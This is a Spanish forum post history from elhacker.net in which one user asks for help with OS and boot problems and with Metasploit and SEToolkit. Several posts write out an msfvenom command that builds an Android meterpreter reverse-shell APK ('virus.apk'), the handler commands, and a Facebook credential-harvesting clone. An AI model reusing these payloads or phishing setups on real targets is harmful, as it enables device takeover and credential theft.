elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


  Mostrar Mensajes
Páginas: [1] 2
1  Sistemas Operativos / Mac OS X / Re: No se ha podido modificar el mapa de particiones. en: 21 Mayo 2017, 12:18 pm
Ya encontré la solución. El problema es que no extraí correctamente el dispositivo cuando lo formateé en mi android. Ahora ya funciona todo bien. Si a alguien le sirve...
2  Sistemas Operativos / Mac OS X / No se ha podido modificar el mapa de particiones. en: 20 Mayo 2017, 10:38 am
Buenas, he estado probando almacenamiento de payloads en sdcards y todo funcionaba perfectamente hasta que de repente, intento formatearlo desde mi mac y me aparece que no se ha podido modificar el mapa de particiones. Tengo un macbook pro 2012, pero tambien lo he probado en el imac y tampoco funciona. Uso una sdcard de 2 gb, si sirve de mucha ayuda...
¿Alguien sabe cuál es el problema y cómo arreglarlo? Sería de mucha ayuda.
Saludos
3  Sistemas Operativos / Windows / Re: Selected Boot device not available. en: 14 Mayo 2017, 19:37 pm
Fíjate si tiene la opción USB HARD DISK y usa esta...

Suerte.

Me aparece
·USB Device
·Onboard or USB Floppy Drive
·Onboard SATA Hard Drive
·Onboard or USB CD-ROM DRIVE

·SYSTEM SETUP
·HARD DRIVE DIAGNOSTICS
·BOOT TO UTILITY PARTITION


Gracias por ayudar
4  Sistemas Operativos / Windows / Selected Boot device not available. en: 14 Mayo 2017, 07:34 am
Buenas a todos, intentando instalar windows 10 desde un usb booteable a mi antiguo PC, sin cargar ni nada me aparece como una especie de grub: entonces selecciono F12 para cambiar el medio por el que instalar y selecciono USB DRIVE (el booteable que tengo win10) y me salta el error de "Selected boot device not available - strikes F1 to retry boot, F2 for setup utility. Cabe remarcar que uso un Dell DIMENSION 3100. Alguien sabe que hacer, o no obstante como resetear de fabrica la maquina por completo?

Atentamente,
JAN
5  Sistemas Operativos / GNU/Linux / CLI en: 18 Abril 2017, 21:15 pm
Buenas, actualmente estoy corriendo  Kali linux2 en una maquina virtual de VBox. El caso es que hoy me he quedado sin espacio en la memoria del disco duro y he decidido aumentarla con "VBoxmanage modifyhd directorio_de_ la_maquina --resize 51200"
A continuación el comando se ha ejecutado aparentemente con éxito y en el menu de vbox me aparecía 50 gb de almacenaje. Parecía que todo iba bien cuando inicio la maquina y me sale el siguiente error: Started Update UTMP about System Runlevel Changes (este es el ultimo que recuerdo), porque nose que me he montado total que he accedido a una terminal independiente donde puedo ejecutar comandos (no es el GRUB) , pero el caso es que ahora no puedo salir de esta, he probado reiniciándose la maquina y nada... alguien me puede decir como salir de esta interfaz y si alguien sabe como solucionar el error de antes. Sería de mucha ayuda... lo siento por no haber hecho un backup...
GRACIAS

PD: TENGO COMO HARDWARE UN MACBOOKPRO
6  Seguridad Informática / Hacking / SETOOLKIT en: 13 Abril 2017, 11:27 am
Buenas, tratando de crear una web falsa para la captura de credenciales, introduzco en el harvester/tabnabbing la ip privada de mi ordenador Kali en este caso 192.168.1.44. Copio el link de facebook (web que quiero spoofear) y le doy a correr. el proceso me sale con éxito y me dice que esta corriendo en el puerto 80, pero con otra maquina(dentro de la misma red) entro en 192.168.1.44 y nada, me dice que google no se puede conectar con el servidor. Pruebo con 192.168.1.44:80 y tampoco nada. Alguien sabe porque sucede esto?
Sería de ayuda!
7  Seguridad Informática / Bugs y Exploits / Modulos y payloads de metasploit en: 2 Marzo 2017, 07:28 am
Buenos días,
haciendo pruebas de exploits "webview", he encontrado el webview_addjavascrpitinterface". Inicio el modulo, y cuando le doy a show options me sale un apartado del modulo y otro con opciones de un payload "androd/meterpreter/reverse_tcp". Es algo predeterminado o estoy haciendo algo mal?

Gracias por la ayuda
8  Seguridad Informática / Bugs y Exploits / respuesta en: 28 Febrero 2017, 22:07 pm
gracias amigo, ya funcionó.
ahora tengo que cambiar el puerto del payload verdad?


· No se debe escribir en mayúsculas
>aquí las reglas del foro
-Engel Lex
9  Seguridad Informática / Bugs y Exploits / metasploit ip error en: 28 Febrero 2017, 21:12 pm
Buenas, tras crear correctamente el archivo apk "virus" con "msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.40 LPORT=4444 > virus.apk"
ejecuto msfconsole, pongo "use exploit/multi/handler/", me lo acepta, selecciono el payload con "set payload android/meterpreter/reverse_tcp", configuro la ip "set LHOST 192.168.1.40", le doy a EXPLOIT y me aparece el siguiente error:

Handler failed to bind to 192.168.1.40:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
  • Exploit completed, but no session was created.


¿Alguien sabe como solucionarlo? ¡Se lo agradecería mucho!



· No se debe escribir en mayúsculas
>aquí las reglas del foro
-Engel Lex
10  Seguridad Informática / Bugs y Exploits / Re: Python error metasploit&kali en: 27 Febrero 2017, 21:21 pm
Lo siento, habia escrito mal "msfvenom " en el foro ( en el comando lo escribí bien). Voy a probar como indicas sin la "R" haber que me dice. Gracies por la informacion.
Saludos
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines